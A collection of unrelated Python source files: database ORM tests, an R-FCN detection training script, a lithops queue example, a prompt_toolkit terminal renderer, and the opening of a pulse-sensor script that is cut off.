('parent_id', 'category', 'name', 'category')])
class TestSortModels(BaseTestCase):
def test_sort_models(self):
class A(Model):
pass
class B(Model):
a = ForeignKeyField(A)
class C(Model):
b = ForeignKeyField(B)
class D(Model):
c = ForeignKeyField(C)
class E(Model):
pass
models = [A, B, C, D, E]
for list_of_models in permutations(models):
sorted_models = sort_models(list_of_models)
self.assertEqual(sorted_models, models)
class TestDBProxy(BaseTestCase):
def test_proxy_context_manager(self):
db = Proxy()
class User(Model):
username = TextField()
class Meta:
database = db
self.assertRaises(AttributeError, User.create_table)
sqlite_db = SqliteDatabase(':memory:')
db.initialize(sqlite_db)
User.create_table()
with db:
self.assertFalse(db.is_closed())
self.assertTrue(db.is_closed())
def test_db_proxy(self):
db = Proxy()
class BaseModel(Model):
class Meta:
database = db
class User(BaseModel):
username = TextField()
class Tweet(BaseModel):
user = ForeignKeyField(User, backref='tweets')
message = TextField()
sqlite_db = SqliteDatabase(':memory:')
db.initialize(sqlite_db)
self.assertEqual(User._meta.database.database, ':memory:')
self.assertEqual(Tweet._meta.database.database, ':memory:')
self.assertTrue(User._meta.database.is_closed())
self.assertTrue(Tweet._meta.database.is_closed())
sqlite_db.connect()
self.assertFalse(User._meta.database.is_closed())
self.assertFalse(Tweet._meta.database.is_closed())
sqlite_db.close()
def test_proxy_decorator(self):
db = DatabaseProxy()
@db.connection_context()
def with_connection():
self.assertFalse(db.is_closed())
@db.atomic()
def with_transaction():
self.assertTrue(db.in_transaction())
@db.manual_commit()
def with_manual_commit():
self.assertTrue(db.in_transaction())
db.initialize(SqliteDatabase(':memory:'))
with_connection()
self.assertTrue(db.is_closed())
with_transaction()
self.assertFalse(db.in_transaction())
with_manual_commit()
self.assertFalse(db.in_transaction())
class Data(TestModel):
key = TextField()
value = TextField()
class Meta:
schema = 'main'
class TestAttachDatabase(ModelTestCase):
database = db_loader('sqlite3')
requires = [Data]
def test_attach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
# Clone data into the in-memory cache.
class CacheData(Data):
class Meta:
schema = 'cache'
self.assertFalse(CacheData.table_exists())
CacheData.create_table(safe=False)
self.assertTrue(CacheData.table_exists())
(CacheData
.insert_from(Data.select(), fields=[Data.id, Data.key, Data.value])
.execute())
# Update the source data.
query = Data.update({Data.value: Data.value + '-x'})
self.assertEqual(query.execute(), 2)
# Verify the source data was updated.
query = Data.select(Data.key, Data.value).order_by(Data.key)
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "main"."data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1-x', 'v2-x'])
# Verify the cached data reflects the original data, pre-update.
query = (CacheData
.select(CacheData.key, CacheData.value)
.order_by(CacheData.key))
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "cache"."cache_data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1', 'v2'])
database.close()
# On re-connecting, the in-memory database will re-attached.
database.connect()
# Cache-Data table does not exist.
self.assertFalse(CacheData.table_exists())
# Double-check the sqlite master table.
curs = database.execute_sql('select * from cache.sqlite_master;')
self.assertEqual(curs.fetchall(), [])
# Because it's in-memory, the table needs to be re-created.
CacheData.create_table(safe=False)
self.assertEqual(CacheData.select().count(), 0)
# Original data is still there.
self.assertEqual(Data.select().count(), 2)
def test_attach_detach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
curs = database.execute_sql('select * from cache.sqlite_master')
self.assertEqual(curs.fetchall(), [])
self.assertFalse(database.attach(':memory:', 'cache'))
self.assertRaises(OperationalError, database.attach, 'foo.db', 'cache')
self.assertTrue(database.detach('cache'))
self.assertFalse(database.detach('cache'))
self.assertRaises(OperationalError, database.execute_sql,
'select * from cache.sqlite_master')
def test_sqlite_schema_support(self):
class CacheData(Data):
class Meta:
schema = 'cache'
# Attach an in-memory cache database and create the cache table.
self.database.attach(':memory:', 'cache')
CacheData.create_table()
tables = self.database.get_tables()
self.assertEqual(tables, ['data'])
tables = self.database.get_tables(schema='cache')
self.assertEqual(tables, ['cache_data'])
|
train_rfcn_fix_hard.py | #!/usr/bin/env python
# --------------------------------------------------------
# R-FCN
# Copyright (c) 2016 Yuwen Xiong, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
"""Train a R-FCN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("R-FCN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals, imdb_rpn_compute_stats
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a R-FCN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ResNet-101")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--imdb_test', dest='imdb_test_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--model', dest='model_name',
help='folder name of model',
default=None, type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(imdb_name, net_name, model_name):
# R-FCN Alternating Optimization
# Solver for each training stage
if imdb_name.startswith('coco'):
solvers = [[net_name, model_name, 'stage1_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage1_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage2_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage2_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage3_rpn_solver360k480k.pt']]
solvers = [os.path.join('.', 'models', 'coco', *s) for s in solvers]
# Iterations for each training stage
max_iters = [480000, 480000, 480000, 480000, 480000]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
'.', 'models', 'coco', net_name, model_name, 'rpn_test.pt')
else:
solvers = [[net_name, model_name, 'stage1_rfcn_mask_ohem_solver80k120k.pt'],[net_name, model_name, 'stage2_rfcn_mask_ohem_solver80k120k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [ 120000 ,120000 ]
return solvers, max_iters
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rfcn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None, output_cache=None,model_name = None):
"""Train a R-FCN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train R-FCN
# Send R-FCN model path over the multiprocessing queue
final_caffemodel = os.path.join(output_dir, output_cache)
final_caffemodel = '/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/' + model_name + '/'+ output_cache
j = 0
if os.path.exists(final_caffemodel):
queue.put({'model_path': final_caffemodel})
else:
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters,
model_name = model_name)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rfcn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
shutil.copyfile(rfcn_model_path, final_caffemodel)
queue.put({'model_path': final_caffemodel})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters = get_solvers(args.imdb_name, args.net_name, args.model_name)
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 0 RPN, compute normalization means and stds'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
if args.imdb_name == 'voc_2007_trainval':
cfg.TRAIN.RPN_NORMALIZE_MEANS = [ 0.00013977, 0.00940836, -0.02203678, -0.03512152]
cfg.TRAIN.RPN_NORMALIZE_STDS = [ 0.11800866, 0.12171428, 0.33160738, 0.43583021]
else:
cfg.TRAIN.RPN_NORMALIZE_MEANS = [ 0.0002916 , 0.01012382, -0.00680352, -0.02723215]
cfg.TRAIN.RPN_NORMALIZE_STDS = [ 0.15335663, 0.12662337, 0.35018575, 0.45649545]
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 R-FCN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
args.pretrained_model = "/net/wujial/py-R-FCN/data/imagenet_models/ResNet-50-model.caffemodel"
print 'using lilac'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
print solvers[0]
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg,
#rpn_file=rpn_stage1_out['proposal_path'],
rpn_file='/net/wujial/py-R-FCN/output/rfcn_alt_opt_5step_ohem/voc_2007_trainval/stage1_rpn_final_proposals.pkl',
output_cache='stage1_mask_rfcn_final.caffemodel',
model_name = args.model_name)
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage1_out = mp_queue.get()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 R-FCN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
p.join()
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
print solvers[0]
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model='/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/'+ args.model_name + '/stage1_mask_rfcn_final.caffemodel',
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file='/net/wujial/py-R-FCN/output/rfcn_alt_opt_5step_ohem/voc_2007_trainval/stage1_rpn_final_proposals.pkl',
output_cache='stage2_mask_rfcn_final.caffemodel',
model_name = args.model_name)
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage1_out = mp_queue.get()
p.join()
|
queue_poll.py | import time
from lithops.multiprocessing import Process, Queue, current_process
def f(q):
print("I'm process {}".format(current_process().pid))
q.put([42, None, 'hello'])
for i in range(3):
q.put('Message no. {} ({})'.format(i, time.time()))
time.sleep(1)
print('Done')
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=(q,))
p.start()
print(q.get()) # prints "[42, None, 'hello']"
consuming = True
while consuming:
try:
res = q.get(block=True, timeout=3)
print(res)
except q.Empty as e:
print('Queue empty!')
consuming = False
p.join()
|
renderer.py | """
Renders the command line on the console.
(Redraws parts of the input line that were changed.)
"""
from __future__ import unicode_literals
from prompt_toolkit.eventloop import Future, From, ensure_future, get_event_loop
from prompt_toolkit.filters import to_filter
from prompt_toolkit.formatted_text import to_formatted_text
from prompt_toolkit.input.base import Input
from prompt_toolkit.layout.mouse_handlers import MouseHandlers
from prompt_toolkit.layout.screen import Point, Screen, WritePosition
from prompt_toolkit.output import Output, ColorDepth
from prompt_toolkit.styles import BaseStyle, DummyStyleTransformation, StyleTransformation
from prompt_toolkit.utils import is_windows
from collections import deque
from six.moves import range
import time
import threading
__all__ = [
'Renderer',
'print_formatted_text',
]
def _output_screen_diff(app, output, screen, current_pos, color_depth,
previous_screen=None, last_style=None, is_done=False,
full_screen=False, attrs_for_style_string=None,
size=None, previous_width=0): # XXX: drop is_done
"""
Render the diff between this screen and the previous screen.
This takes two `Screen` instances. The one that represents the output like
it was during the last rendering and one that represents the current
output raster. Looking at these two `Screen` instances, this function will
render the difference by calling the appropriate methods of the `Output`
object that only paint the changes to the terminal.
This is some performance-critical code which is heavily optimized.
Don't change things without profiling first.
:param current_pos: Current cursor position.
:param last_style: The style string, used for drawing the last drawn
character. (Color/attributes.)
:param attrs_for_style_string: :class:`._StyleStringToAttrsCache` instance.
:param width: The width of the terminal.
:param previous_width: The width of the terminal during the last rendering.
"""
width, height = size.columns, size.rows
#: Remember the last printed character.
last_style = [last_style] # nonlocal
#: Variable for capturing the output.
write = output.write
write_raw = output.write_raw
# Create locals for the most used output methods.
# (Save expensive attribute lookups.)
_output_set_attributes = output.set_attributes
_output_reset_attributes = output.reset_attributes
_output_cursor_forward = output.cursor_forward
_output_cursor_up = output.cursor_up
_output_cursor_backward = output.cursor_backward
# Hide cursor before rendering. (Avoid flickering.)
output.hide_cursor()
def reset_attributes():
" Wrapper around Output.reset_attributes. "
_output_reset_attributes()
last_style[0] = None # Forget last char after resetting attributes.
def move_cursor(new):
" Move cursor to this `new` point. Returns the given Point. "
current_x, current_y = current_pos.x, current_pos.y
if new.y > current_y:
# Use newlines instead of CURSOR_DOWN, because this might add new lines.
# CURSOR_DOWN will never create new lines at the bottom.
# Also reset attributes, otherwise the newline could draw a
# background color.
reset_attributes()
write('\r\n' * (new.y - current_y))
current_x = 0
_output_cursor_forward(new.x)
return new
elif new.y < current_y:
_output_cursor_up(current_y - new.y)
if current_x >= width - 1:
write('\r')
_output_cursor_forward(new.x)
elif new.x < current_x or current_x >= width - 1:
_output_cursor_backward(current_x - new.x)
elif new.x > current_x:
_output_cursor_forward(new.x - current_x)
return new
def output_char(char):
"""
Write the output of this character.
"""
# If the last printed character has the same style, don't output the
# style again.
the_last_style = last_style[0] # Either `None` or a style string.
if the_last_style == char.style:
write(char.char)
else:
# Look up `Attr` for this style string. Only set attributes if different.
# (Two style strings can still have the same formatting.)
# Note that an empty style string can have formatting that needs to
# be applied, because of style transformations.
new_attrs = attrs_for_style_string[char.style]
if not the_last_style or new_attrs != attrs_for_style_string[the_last_style]:
_output_set_attributes(new_attrs, color_depth)
write(char.char)
last_style[0] = char.style
# Render for the first time: reset styling.
if not previous_screen:
reset_attributes()
# Disable autowrap. (When entering a the alternate screen, or anytime when
# we have a prompt. - In the case of a REPL, like IPython, people can have
# background threads, and it's hard for debugging if their output is not
# wrapped.)
if not previous_screen or not full_screen:
output.disable_autowrap()
# When the previous screen has a different size, redraw everything anyway.
# Also when we are done. (We might take up less rows, so clearing is important.)
if is_done or not previous_screen or previous_width != width: # XXX: also consider height??
current_pos = move_cursor(Point(x=0, y=0))
reset_attributes()
output.erase_down()
previous_screen = Screen()
# Get height of the screen.
# (height changes as we loop over data_buffer, so remember the current value.)
# (Also make sure to clip the height to the size of the output.)
current_height = min(screen.height, height)
# Loop over the rows.
row_count = min(max(screen.height, previous_screen.height), height)
c = 0 # Column counter.
for y in range(row_count):
new_row = screen.data_buffer[y]
previous_row = previous_screen.data_buffer[y]
zero_width_escapes_row = screen.zero_width_escapes[y]
new_max_line_len = min(width - 1, max(new_row.keys()) if new_row else 0)
previous_max_line_len = min(width - 1, max(previous_row.keys()) if previous_row else 0)
# Loop over the columns.
c = 0
while c < new_max_line_len + 1:
new_char = new_row[c]
old_char = previous_row[c]
char_width = (new_char.width or 1)
# When the old and new character at this position are different,
# draw the output. (Because of the performance, we don't call
# `Char.__ne__`, but inline the same expression.)
if new_char.char != old_char.char or new_char.style != old_char.style:
current_pos = move_cursor(Point(x=c, y=y))
# Send injected escape sequences to output.
if c in zero_width_escapes_row:
write_raw(zero_width_escapes_row[c])
output_char(new_char)
current_pos = Point(x=current_pos.x + char_width, y=current_pos.y)
c += char_width
# If the new line is shorter, trim it.
if previous_screen and new_max_line_len < previous_max_line_len:
current_pos = move_cursor(Point(x=new_max_line_len + 1, y=y))
reset_attributes()
output.erase_end_of_line()
# Correctly reserve vertical space as required by the layout.
# When this is a new screen (drawn for the first time), or for some reason
# higher than the previous one. Move the cursor once to the bottom of the
# output. That way, we're sure that the terminal scrolls up, even when the
# lower lines of the canvas just contain whitespace.
# The most obvious reason that we actually want this behaviour is the avoid
# the artifact of the input scrolling when the completion menu is shown.
# (If the scrolling is actually wanted, the layout can still be build in a
# way to behave that way by setting a dynamic height.)
if current_height > previous_screen.height:
current_pos = move_cursor(Point(x=0, y=current_height - 1))
# Move cursor:
if is_done:
current_pos = move_cursor(Point(x=0, y=current_height))
output.erase_down()
else:
current_pos = move_cursor(
screen.get_cursor_position(app.layout.current_window))
if is_done or not full_screen:
output.enable_autowrap()
# Always reset the color attributes. This is important because a background
# thread could print data to stdout and we want that to be displayed in the
# default colors. (Also, if a background color has been set, many terminals
# give weird artifacts on resize events.)
reset_attributes()
if screen.show_cursor or is_done:
output.show_cursor()
return current_pos, last_style[0]
class HeightIsUnknownError(Exception):
" Information unavailable. Did not yet receive the CPR response. "
class _StyleStringToAttrsCache(dict):
"""
A cache structure that maps style strings to :class:`.Attr`.
(This is an important speed up.)
"""
def __init__(self, get_attrs_for_style_str, style_transformation):
assert callable(get_attrs_for_style_str)
assert isinstance(style_transformation, StyleTransformation)
self.get_attrs_for_style_str = get_attrs_for_style_str
self.style_transformation = style_transformation
def __missing__(self, style_str):
attrs = self.get_attrs_for_style_str(style_str)
attrs = self.style_transformation.transform_attrs(attrs)
self[style_str] = attrs
return attrs
class CPR_Support(object):
" Enum: whether or not CPR is supported. "
SUPPORTED = 'SUPPORTED'
NOT_SUPPORTED = 'NOT_SUPPORTED'
UNKNOWN = 'UNKNOWN'
class Renderer(object):
"""
Typical usage:
::
output = Vt100_Output.from_pty(sys.stdout)
r = Renderer(style, output)
r.render(app, layout=...)
"""
CPR_TIMEOUT = 2 # Time to wait until we consider CPR to be not supported.
def __init__(self, style, output, input, full_screen=False,
mouse_support=False, cpr_not_supported_callback=None):
assert isinstance(style, BaseStyle)
assert isinstance(output, Output)
assert isinstance(input, Input)
assert callable(cpr_not_supported_callback) or cpr_not_supported_callback is None
self.style = style
self.output = output
self.input = input
self.full_screen = full_screen
self.mouse_support = to_filter(mouse_support)
self.cpr_not_supported_callback = cpr_not_supported_callback
self._in_alternate_screen = False
self._mouse_support_enabled = False
self._bracketed_paste_enabled = False
# Future set when we are waiting for a CPR flag.
self._waiting_for_cpr_futures = deque()
self.cpr_support = CPR_Support.UNKNOWN
if not input.responds_to_cpr:
self.cpr_support = CPR_Support.NOT_SUPPORTED
# Cache for the style.
self._attrs_for_style = None
self._last_style_hash = None
self._last_transformation_hash = None
self._last_color_depth = None
self.reset(_scroll=True)
def reset(self, _scroll=False, leave_alternate_screen=True):
# Reset position
self._cursor_pos = Point(x=0, y=0)
# Remember the last screen instance between renderers. This way,
# we can create a `diff` between two screens and only output the
# difference. It's also to remember the last height. (To show for
# instance a toolbar at the bottom position.)
self._last_screen = None
self._last_size = None
self._last_style = None
# Default MouseHandlers. (Just empty.)
self.mouse_handlers = MouseHandlers()
#: Space from the top of the layout, until the bottom of the terminal.
#: We don't know this until a `report_absolute_cursor_row` call.
self._min_available_height = 0
# In case of Windows, also make sure to scroll to the current cursor
# position. (Only when rendering the first time.)
if is_windows() and _scroll:
self.output.scroll_buffer_to_prompt()
# Quit alternate screen.
if self._in_alternate_screen and leave_alternate_screen:
self.output.quit_alternate_screen()
self._in_alternate_screen = False
# Disable mouse support.
if self._mouse_support_enabled:
self.output.disable_mouse_support()
self._mouse_support_enabled = False
# Disable bracketed paste.
if self._bracketed_paste_enabled:
self.output.disable_bracketed_paste()
self._bracketed_paste_enabled = False
# Flush output. `disable_mouse_support` needs to write to stdout.
self.output.flush()
@property
def last_rendered_screen(self):
"""
The `Screen` class that was generated during the last rendering.
This can be `None`.
"""
return self._last_screen
@property
def height_is_known(self):
"""
True when the height from the cursor until the bottom of the terminal
is known. (It's often nicer to draw bottom toolbars only if the height
is known, in order to avoid flickering when the CPR response arrives.)
"""
return self.full_screen or self._min_available_height > 0 or \
is_windows() # On Windows, we don't have to wait for a CPR.
@property
def rows_above_layout(self):
"""
Return the number of rows visible in the terminal above the layout.
"""
if self._in_alternate_screen:
return 0
elif self._min_available_height > 0:
total_rows = self.output.get_size().rows
last_screen_height = self._last_screen.height if self._last_screen else 0
return total_rows - max(self._min_available_height, last_screen_height)
else:
raise HeightIsUnknownError('Rows above layout is unknown.')
def request_absolute_cursor_position(self):
"""
Get current cursor position.
We do this to calculate the minimum available height that we can
consume for rendering the prompt. This is the available space below te
cursor.
For vt100: Do CPR request. (answer will arrive later.)
For win32: Do API call. (Answer comes immediately.)
"""
# Only do this request when the cursor is at the top row. (after a
# clear or reset). We will rely on that in `report_absolute_cursor_row`.
assert self._cursor_pos.y == 0
# In full-screen mode, always use the total height as min-available-height.
if self.full_screen:
self._min_available_height = self.output.get_size().rows
# For Win32, we have an API call to get the number of rows below the
# cursor.
elif is_windows():
self._min_available_height = self.output.get_rows_below_cursor_position()
# Use CPR.
else:
if self.cpr_support == CPR_Support.NOT_SUPPORTED:
return
def do_cpr():
# Asks for a cursor position report (CPR).
self._waiting_for_cpr_futures.append(Future())
self.output.ask_for_cpr()
if self.cpr_support == CPR_Support.SUPPORTED:
do_cpr()
# If we don't know whether CPR is supported, only do a request if
# none is pending, and test it, using a timer.
elif self.cpr_support == CPR_Support.UNKNOWN and not self.waiting_for_cpr:
do_cpr()
def timer():
time.sleep(self.CPR_TIMEOUT)
# Not set in the meantime -> not supported.
if self.cpr_support == CPR_Support.UNKNOWN:
self.cpr_support = CPR_Support.NOT_SUPPORTED
if self.cpr_not_supported_callback:
# Make sure to call this callback in the main thread.
get_event_loop().call_from_executor(self.cpr_not_supported_callback)
t = threading.Thread(target=timer)
t.daemon = True
t.start()
def report_absolute_cursor_row(self, row):
"""
To be called when we know the absolute cursor position.
(As an answer of a "Cursor Position Request" response.)
"""
self.cpr_support = CPR_Support.SUPPORTED
# Calculate the amount of rows from the cursor position until the
# bottom of the terminal.
total_rows = self.output.get_size().rows
rows_below_cursor = total_rows - row + 1
# Set the minimum available height.
self._min_available_height = rows_below_cursor
# Pop and set waiting for CPR future.
try:
f = self._waiting_for_cpr_futures.popleft()
except IndexError:
pass # Received CPR response without having a CPR.
else:
f.set_result(None)
@property
def waiting_for_cpr(self):
"""
Waiting for CPR flag. True when we send the request, but didn't got a
response.
"""
return bool(self._waiting_for_cpr_futures)
def wait_for_cpr_responses(self, timeout=1):
"""
Wait for a CPR response.
"""
cpr_futures = list(self._waiting_for_cpr_futures) # Make copy.
# When there are no CPRs in the queue. Don't do anything.
if not cpr_futures or self.cpr_support == CPR_Support.NOT_SUPPORTED:
return Future.succeed(None)
f = Future()
# When a CPR has been received, set the result.
def wait_for_responses():
for response_f in cpr_futures:
yield From(response_f)
if not f.done():
f.set_result(None)
ensure_future(wait_for_responses())
# Timeout.
def wait_for_timeout():
time.sleep(timeout)
# Got timeout.
if not f.done():
self._waiting_for_cpr_futures = deque()
f.set_result(None)
t = threading.Thread(target=wait_for_timeout)
t.daemon = True
t.start()
return f
def render(self, app, layout, is_done=False):
"""
Render the current interface to the output.
:param is_done: When True, put the cursor at the end of the interface. We
won't print any changes to this part.
"""
output = self.output
# Enter alternate screen.
if self.full_screen and not self._in_alternate_screen:
self._in_alternate_screen = True
output.enter_alternate_screen()
# Enable bracketed paste.
if not self._bracketed_paste_enabled:
self.output.enable_bracketed_paste()
self._bracketed_paste_enabled = True
# Enable/disable mouse support.
needs_mouse_support = self.mouse_support()
if needs_mouse_support and not self._mouse_support_enabled:
output.enable_mouse_support()
self._mouse_support_enabled = True
elif not needs_mouse_support and self._mouse_support_enabled:
output.disable_mouse_support()
self._mouse_support_enabled = False
# Create screen and write layout to it.
size = output.get_size()
screen = Screen()
screen.show_cursor = False # Hide cursor by default, unless one of the
# containers decides to display it.
mouse_handlers = MouseHandlers()
# Calculate height.
if self.full_screen:
height = size.rows
elif is_done:
# When we are done, we don't necessary want to fill up until the bottom.
height = layout.container.preferred_height(size.columns, size.rows).preferred
else:
last_height = self._last_screen.height if self._last_screen else 0
height = max(self._min_available_height,
last_height,
layout.container.preferred_height(size.columns, size.rows).preferred)
height = min(height, size.rows)
# When te size changes, don't consider the previous screen.
if self._last_size != size:
self._last_screen = None
# When we render using another style or another color depth, do a full
# repaint. (Forget about the previous rendered screen.)
# (But note that we still use _last_screen to calculate the height.)
if (self.style.invalidation_hash() != self._last_style_hash or
app.style_transformation.invalidation_hash() != self._last_transformation_hash or
app.color_depth != self._last_color_depth):
self._last_screen = None
self._attrs_for_style = None
if self._attrs_for_style is None:
self._attrs_for_style = _StyleStringToAttrsCache(
self.style.get_attrs_for_style_str,
app.style_transformation)
self._last_style_hash = self.style.invalidation_hash()
self._last_transformation_hash = app.style_transformation.invalidation_hash()
self._last_color_depth = app.color_depth
layout.container.write_to_screen(screen, mouse_handlers, WritePosition(
xpos=0,
ypos=0,
width=size.columns,
height=height,
), parent_style='', erase_bg=False, z_index=None)
screen.draw_all_floats()
# When grayed. Replace all styles in the new screen.
if app.exit_style:
screen.append_style_to_content(app.exit_style)
# Process diff and write to output.
self._cursor_pos, self._last_style = _output_screen_diff(
app, output, screen, self._cursor_pos, app.color_depth,
self._last_screen, self._last_style, is_done,
full_screen=self.full_screen,
attrs_for_style_string=self._attrs_for_style, size=size,
previous_width=(self._last_size.columns if self._last_size else 0))
self._last_screen = screen
self._last_size = size
self.mouse_handlers = mouse_handlers
output.flush()
# Set visible windows in layout.
app.layout.visible_windows = screen.visible_windows
if is_done:
self.reset()
def erase(self, leave_alternate_screen=True):
"""
Hide all output and put the cursor back at the first line. This is for
instance used for running a system command (while hiding the CLI) and
later resuming the same CLI.)
:param leave_alternate_screen: When True, and when inside an alternate
screen buffer, quit the alternate screen.
"""
output = self.output
output.cursor_backward(self._cursor_pos.x)
output.cursor_up(self._cursor_pos.y)
output.erase_down()
output.reset_attributes()
output.enable_autowrap()
output.flush()
self.reset(leave_alternate_screen=leave_alternate_screen)
def clear(self):
"""
Clear screen and go to 0,0
"""
# Erase current output first.
self.erase()
# Send "Erase Screen" command and go to (0, 0).
output = self.output
output.erase_screen()
output.cursor_goto(0, 0)
output.flush()
self.request_absolute_cursor_position()
def print_formatted_text(
output, formatted_text, style, style_transformation=None,
color_depth=None):
"""
Print a list of (style_str, text) tuples in the given style to the output.
"""
assert isinstance(output, Output)
assert isinstance(style, BaseStyle)
assert style_transformation is None or isinstance(style_transformation, StyleTransformation)
assert color_depth is None or color_depth in ColorDepth._ALL
fragments = to_formatted_text(formatted_text)
style_transformation = style_transformation or DummyStyleTransformation()
color_depth = color_depth or ColorDepth.default()
# Reset first.
output.reset_attributes()
output.enable_autowrap()
# Print all (style_str, text) tuples.
attrs_for_style_string = _StyleStringToAttrsCache(
style.get_attrs_for_style_str,
style_transformation)
for style_str, text in fragments:
attrs = attrs_for_style_string[style_str]
if attrs:
output.set_attributes(attrs, color_depth)
else:
output.reset_attributes()
# Assume that the output is raw, and insert a carriage return before
# every newline. (Also important when the front-end is a telnet client.)
assert '\r' not in text
output.write(text.replace('\n', '\r\n'))
# Reset again.
output.reset_attributes()
output.flush()
|
main.py | # extended from https://github.com/WorldFamousElectronics/PulseSensor_Amped_Arduino
import time
import threading
import board
import busio
i2c = busio.I2C(board.SCL, board.SDA)
import adafruit_ads1x15.ads1015 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
class Pulsesensor:
def __init__(self, channel = 0, bus = 0, device = 0):
self.channel = channel
self.BPM = 0
#self.adc = MCP3008(bus, device)
self.ads = ADS.ADS1015(i2c)
self.chan = AnalogIn(self.ads, ADS.P0)
def getBPMLoop(self):
# init variables
rate = [0] * 10 # array to hold last 10 IBI values
sampleCounter = 0 # used to determine pulse timing
lastBeatTime = 0 # used to find IBI
